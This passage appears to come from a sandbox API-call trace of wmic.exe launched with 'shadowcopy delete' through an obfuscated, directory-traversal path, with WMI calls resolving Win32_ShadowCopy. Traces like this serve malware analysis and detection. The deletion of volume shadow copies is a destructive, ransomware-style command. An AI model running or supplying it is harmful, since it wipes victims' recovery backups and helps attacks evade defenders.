out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x60070001c)) returned 0x0 [0180.216] malloc (_Size=0x18) returned 0x109920 [0180.216] malloc (_Size=0x18) returned 0x109940 [0180.216] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] SysStringLen (param_1="TABLE") returned 0x5 [0180.217] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.217] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.217] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.217] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.217] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.217] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0180.217] malloc (_Size=0x30) returned 0x108580 [0180.217] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.217] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.217] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.217] IUnknown:Release (This=0x1f69cc0) returned 0x0 [0180.217] FreeThreadedDOMDocument:IUnknown:Release (This=0x1f6bc50) returned 0x1 [0180.217] FreeThreadedDOMDocument:IUnknown:Release (This=0x1f671d0) returned 0x0 [0180.217] free (_Block=0x109440) [0180.217] GetCommandLineW () returned="\"C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\wmic.exe\" shadowcopy delete" [0180.218] malloc (_Size=0xf0) returned 0x10cd30 [0180.218] memcpy_s (in: _Destination=0x10cd30, _DestinationSize=0xee, _Source=0x1b25de, _SourceSize=0xe2 | out: _Destination=0x10cd30) returned 0x0 [0180.218] malloc (_Size=0x18) returned 0x109440 [0180.218] malloc (_Size=0x18) returned 0x109960 [0180.218] malloc (_Size=0x18) returned 0x109980 [0180.218] malloc (_Size=0x18) returned 0x1099a0 [0180.218] malloc (_Size=0x80) returned 0x106eb0 [0180.218] GetLocalTime (in: lpSystemTime=0x1af630 | out: lpSystemTime=0x1af630*(wYear=0x7e3, wMonth=0xb, wDayOfWeek=0x1, wDay=0xb, wHour=0xa, wMinute=0x9, wSecond=0x29, wMilliseconds=0x55)) [0180.218] _vsnwprintf (in: _Buffer=0x106eb0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1af588 | out: _Buffer="11-11-2019T10:09:41") returned 19 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] malloc (_Size=0x26) returned 0x1070a0 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] malloc (_Size=0x26) returned 0x1070d0 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.218] malloc (_Size=0x16) returned 0x1099c0 [0180.218] lstrlenW (lpString="shadowcopy") returned 10 [0180.219] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0180.219] malloc (_Size=0x16) returned 0x1099e0 [0180.219] malloc (_Size=0x8) returned 0x107100 [0180.219] free (_Block=0x0) [0180.219] free (_Block=0x1099c0) [0180.219] lstrlenW (lpString=" shadowcopy delete") returned 18 [0180.219] malloc (_Size=0xe) returned 0x1099c0 [0180.219] lstrlenW (lpString="delete") returned 6 [0180.219] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0180.219] malloc (_Size=0xe) returned 0x109a00 [0180.219] malloc (_Size=0x10) returned 0x109a20 [0180.219] memmove_s (in: _Destination=0x109a20, _DestinationSize=0x8, _Source=0x107100, _SourceSize=0x8 | out: _Destination=0x109a20) returned 0x0 [0180.219] free (_Block=0x107100) [0180.219] free (_Block=0x0) [0180.219] free (_Block=0x1099c0) [0180.219] malloc (_Size=0x10) returned 0x1099c0 [0180.219] lstrlenW (lpString="QUIT") returned 4 [0180.219] lstrlenW (lpString="shadowcopy") returned 10 [0180.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0180.219] lstrlenW (lpString="EXIT") returned 4 [0180.219] lstrlenW (lpString="shadowcopy") returned 10 [0180.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0180.219] free (_Block=0x1099c0) [0180.219] WbemLocator:IUnknown:AddRef (This=0x1b91390) returned 0x2 [0180.219] malloc (_Size=0x10) returned 0x1099c0 [0180.219] lstrlenW (lpString="/") returned 1 [0180.219] lstrlenW (lpString="shadowcopy") returned 10 [0180.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0180.219] lstrlenW (lpString="-") returned 1 [0180.219] lstrlenW (lpString="shadowcopy") returned 10 [0180.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0180.219] lstrlenW (lpString="CLASS") returned 5 [0180.220] lstrlenW (lpString="shadowcopy") returned 10 [0180.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0180.222] lstrlenW (lpString="PATH") returned 4 [0180.222] lstrlenW (lpString="shadowcopy") returned 10 [0180.222] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0180.222] lstrlenW (lpString="CONTEXT") returned 7 [0180.222] lstrlenW (lpString="shadowcopy") returned 10 [0180.222] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0180.222] lstrlenW (lpString="shadowcopy") returned 10 [0180.222] malloc (_Size=0x16) returned 0x109a40 [0180.222] lstrlenW (lpString="shadowcopy") returned 10 [0180.225] GetCurrentThreadId () returned 0x514 [0180.225] ??0CHString@@QEAA@XZ () returned 0x1af440 [0180.226] malloc (_Size=0x18) returned 0x109a60 [0180.226] malloc (_Size=0x18) returned 0x109a80 [0180.226] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff602998 | out: ppNamespace=0xff602998*=0x1ba3a98) returned 0x0 [0180.257] free (_Block=0x109a80) [0180.257] free (_Block=0x109a60) [0180.257] CoSetProxyBlanket (pProxy=0x1ba3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0180.257] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.257] GetCurrentThreadId () returned 0x514 [0180.257] ??0CHString@@QEAA@XZ () returned 0x1af2d8 [0180.257] malloc (_Size=0x18) returned 0x109a60 [0180.257] malloc (_Size=0x18) returned 0x109a80 [0180.258] malloc (_Size=0x18) returned 0x109aa0 [0180.258] malloc (_Size=0x18) returned 0x109ac0 [0180.258] SysStringLen (param_1="root\\cli") returned 0x8 [0180.258] SysStringLen (param_1="\\") returned 0x1 [0180.258] malloc (_Size=0x18) returned 0x109ae0 [0180.258] SysStringLen (param_1="root\\cli\\") returned 0x9 [0180.258] SysStringLen (param_1="ms_409") returned 0x6 [0180.258] free (_Block=0x109ac0) [0180.258] free (_Block=0x109aa0) [0180.258] free (_Block=0x109a80) [0180.258] free (_Block=0x109a60) [0180.258] malloc (_Size=0x18) returned 0x109a60 [0180.258] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff6029a0 | out: ppNamespace=0xff6029a0*=0x1ba3b28) returned 0x0 [0180.269] free (_Block=0x109a60) [0180.269] free (_Block=0x109ae0) [0180.269] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.269] GetCurrentThreadId () returned 0x514 [0180.269] ??0CHString@@QEAA@XZ () returned 0x1af450 [0180.269] malloc (_Size=0x18) returned 0x109ae0 [0180.269] malloc (_Size=0x18) returned 0x109a60 [0180.270] malloc (_Size=0x18) returned 0x109a80 [0180.270] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0180.270] malloc (_Size=0x3a) returned 0x107100 [0180.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff591980, cbMultiByte=-1, lpWideCharStr=0x107100, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0180.270] free (_Block=0x107100) [0180.270] malloc (_Size=0x18) returned 0x109aa0 [0180.270] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0180.270] SysStringLen (param_1="shadowcopy") returned 0xa [0180.270] malloc (_Size=0x18) returned 0x109ac0 [0180.270] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0180.270] SysStringLen (param_1="'") returned 0x1 [0180.270] free (_Block=0x109aa0) [0180.270] free (_Block=0x109a80) [0180.270] free (_Block=0x109a60) [0180.270] free (_Block=0x109ae0) [0180.270] IWbemServices:GetObject (in: This=0x1ba3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1af458*=0x0, ppCallResult=0x0 | out: ppObject=0x1af458*=0x1bb04e0, ppCallResult=0x0) returned 0x0 [0180.283] malloc (_Size=0x18) returned 0x109ae0 [0180.283] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="Target", lFlags=0, pVal=0x1af380*(varType=0x0, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1=0xff602998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af380*(varType=0x8, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.283] free (_Block=0x109ae0) [0180.283] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.283] malloc (_Size=0x3e) returned 0x107100 [0180.283] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.283] malloc (_Size=0x18) returned 0x109ae0 [0180.283] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="PWhere", lFlags=0, pVal=0x1af380*(varType=0x0, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e2c78, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af380*(varType=0x8, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.283] free (_Block=0x109ae0) [0180.284] lstrlenW (lpString=" Where ID = '#'") returned 15 [0180.284] malloc (_Size=0x20) returned 0x10ce30 [0180.284] lstrlenW (lpString=" Where ID = '#'") returned 15 [0180.284] malloc (_Size=0x18) returned 0x109ae0 [0180.284] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="Connection", lFlags=0, pVal=0x1af380*(varType=0x0, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1=0x222a28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af380*(varType=0xd, wReserved1=0xff60, wReserved2=0x0, wReserved3=0x0, varVal1=0x1bb09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.284] free (_Block=0x109ae0) [0180.284] IUnknown:QueryInterface (in: This=0x1bb09c0, riid=0xff597360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1af370 | out: ppvObject=0x1af370*=0x1bb09c0) returned 0x0 [0180.284] GetCurrentThreadId () returned 0x514 [0180.284] ??0CHString@@QEAA@XZ () returned 0x1af298 [0180.284] malloc (_Size=0x18) returned 0x109ae0 [0180.284] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Namespace", lFlags=0, pVal=0x1af2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff5a738f, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.284] free (_Block=0x109ae0) [0180.284] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0180.284] malloc (_Size=0x16) returned 0x109ae0 [0180.284] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0180.284] malloc (_Size=0x18) returned 0x109a60 [0180.284] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Locale", lFlags=0, pVal=0x1af2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.284] free (_Block=0x109a60) [0180.284] lstrlenW (lpString="ms_409") returned 6 [0180.284] malloc (_Size=0xe) returned 0x109a60 [0180.284] lstrlenW (lpString="ms_409") returned 6 [0180.284] malloc (_Size=0x18) returned 0x109a80 [0180.285] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="User", lFlags=0, pVal=0x1af2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.285] free (_Block=0x109a80) [0180.285] malloc (_Size=0x18) returned 0x109a80 [0180.285] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Password", lFlags=0, pVal=0x1af2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.285] free (_Block=0x109a80) [0180.285] malloc (_Size=0x18) returned 0x109a80 [0180.285] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Server", lFlags=0, pVal=0x1af2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.285] free (_Block=0x109a80) [0180.285] lstrlenW (lpString=".") returned 1 [0180.285] malloc (_Size=0x4) returned 0x107150 [0180.285] lstrlenW (lpString=".") returned 1 [0180.285] malloc (_Size=0x18) returned 0x109a80 [0180.285] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Authority", lFlags=0, pVal=0x1af2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0x109ae0), pType=0x0, plFlavor=0x0) returned 0x0 [0180.285] free (_Block=0x109a80) [0180.285] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.285] IUnknown:Release (This=0x1bb09c0) returned 0x1 [0180.285] GetCurrentThreadId () returned 0x514 [0180.285] ??0CHString@@QEAA@XZ () returned 0x1af298 [0180.285] malloc (_Size=0x18) returned 0x109a80 [0180.285] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="__RELPATH", lFlags=0, pVal=0x1af2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24fed8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1af2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0180.285] free (_Block=0x109a80) [0180.286] malloc (_Size=0x18) returned 0x109a80 [0180.286] GetCurrentThreadId () returned 0x514 [0180.286] ??0CHString@@QEAA@XZ () returned 0x1af118 [0180.286] ??0CHString@@QEAA@PEBG@Z () returned 0x1af130 [0180.286] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1af0c0 [0180.286] ?Empty@CHString@@QEAAXXZ () returned 0x7fef81f482c [0180.286] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x10ce60 [0180.286] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0180.286] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1af080 [0180.287] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1af0c8 [0180.287] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1af130 [0180.287] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.287] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.287] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1af088 [0180.287] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1af0c0 [0180.287] ??1CHString@@QEAA@XZ () returned 0x1 [0180.287] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x10ced0 [0180.287] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0180.288] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1af080 [0180.288] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1af0c8 [0180.288] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1af130 [0180.288] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.288] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.288] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1af088 [0180.288] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1af0c0 [0180.288] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.288] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef81f4820 [0180.288] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.288] malloc (_Size=0x18) returned 0x109aa0 [0180.288] malloc (_Size=0x18) returned 0x109b00 [0180.288] malloc (_Size=0x18) returned 0x109b20 [0180.288] malloc (_Size=0x18) returned 0x109b40 [0180.288] malloc (_Size=0x18) returned 0x109b60 [0180.288] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0180.288] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0180.288] malloc (_Size=0x18) returned 0x109b80 [0180.288] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0180.288] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0180.288] malloc (_Size=0x18) returned 0x109ba0 [0180.288] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0180.288] SysStringLen (param_1="\"") returned 0x1 [0180.288] free (_Block=0x109b80) [0180.288] free (_Block=0x109b60) [0180.289] free (_Block=0x109b40) [0180.289] free (_Block=0x109b20) [0180.289] free (_Block=0x109b00) [0180.289] free (_Block=0x109aa0) [0180.289] IWbemServices:GetObject (in: This=0x1ba3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1af108*=0x0, ppCallResult=0x0 | out: ppObject=0x1af108*=0x1bb0a50, ppCallResult=0x0) returned 0x0 [0180.293] malloc (_Size=0x18) returned 0x109aa0 [0180.293] IWbemClassObject:Get (in: This=0x1bb0a50, wszName="Text", lFlags=0, pVal=0x1af140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff602ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1af140*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2514e0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1ddff0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0180.293] free (_Block=0x109aa0) [0180.294] SafeArrayGetLBound (in: psa=0x2514e0, nDim=0x1, plLbound=0x1af120 | out: plLbound=0x1af120) returned 0x0 [0180.294] SafeArrayGetUBound (in: psa=0x2514e0, nDim=0x1, plUbound=0x1af110 | out: plUbound=0x1af110) returned 0x0 [0180.294] SafeArrayGetElement (in: psa=0x2514e0, rgIndices=0x1af104, pv=0x1af158 | out: pv=0x1af158) returned 0x0 [0180.294] malloc (_Size=0x18) returned 0x109aa0 [0180.294] malloc (_Size=0x18) returned 0x109b00 [0180.294] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0180.294] free (_Block=0x109aa0) [0180.294] IUnknown:Release (This=0x1bb0a50) returned 0x0 [0180.294] free (_Block=0x109ba0) [0180.294] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.294] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.294] free (_Block=0x109a80) [0180.294] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.294] lstrlenW (lpString="Shadow copy management.") returned 23 [0180.294] malloc (_Size=0x30) returned 0x1085c0 [0180.294] lstrlenW (lpString="Shadow copy management.") returned 23 [0180.294] free (_Block=0x109b00) [0180.294] IUnknown:Release (This=0x1bb04e0) returned 0x0 [0180.294] free (_Block=0x109ac0) [0180.294] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.294] lstrlenW (lpString="PATH") returned 4 [0180.294] lstrlenW (lpString="delete") returned 6 [0180.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0180.294] lstrlenW (lpString="WHERE") returned 5 [0180.294] lstrlenW (lpString="delete") returned 6 [0180.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0180.294] lstrlenW (lpString="(") returned 1 [0180.294] lstrlenW (lpString="delete") returned 6 [0180.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0180.295] lstrlenW (lpString="/") returned 1 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0180.295] lstrlenW (lpString="-") returned 1 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0180.295] malloc (_Size=0x18) returned 0x109ac0 [0180.295] lstrlenW (lpString="GET") returned 3 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0180.295] lstrlenW (lpString="LIST") returned 4 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0180.295] lstrlenW (lpString="SET") returned 3 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0180.295] lstrlenW (lpString="CREATE") returned 6 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0180.295] lstrlenW (lpString="CALL") returned 4 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0180.295] lstrlenW (lpString="ASSOC") returned 5 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0180.295] lstrlenW (lpString="DELETE") returned 6 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.295] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0180.295] free (_Block=0x109ac0) [0180.295] lstrlenW (lpString="/") returned 1 [0180.295] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0180.296] lstrlenW (lpString="-") returned 1 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] malloc (_Size=0xe) returned 0x109ac0 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] lstrlenW (lpString="GET") returned 3 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0180.296] lstrlenW (lpString="LIST") returned 4 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0180.296] lstrlenW (lpString="SET") returned 3 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0180.296] lstrlenW (lpString="CREATE") returned 6 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0180.296] lstrlenW (lpString="CALL") returned 4 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0180.296] lstrlenW (lpString="ASSOC") returned 5 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0180.296] lstrlenW (lpString="DELETE") returned 6 [0180.296] lstrlenW (lpString="delete") returned 6 [0180.296] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0180.296] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.296] malloc (_Size=0x3e) returned 0x10ce60 [0180.296] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.296] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffa2a0 | out: _String="Select", _Context=0xffffffffffffa2a0) returned="Select" [0180.296] malloc (_Size=0x18) returned 0x109b00 [0180.296] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0180.296] lstrlenW (lpString="FROM") returned 4 [0180.296] lstrlenW (lpString="*") returned 1 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0180.297] malloc (_Size=0x18) returned 0x109a80 [0180.297] free 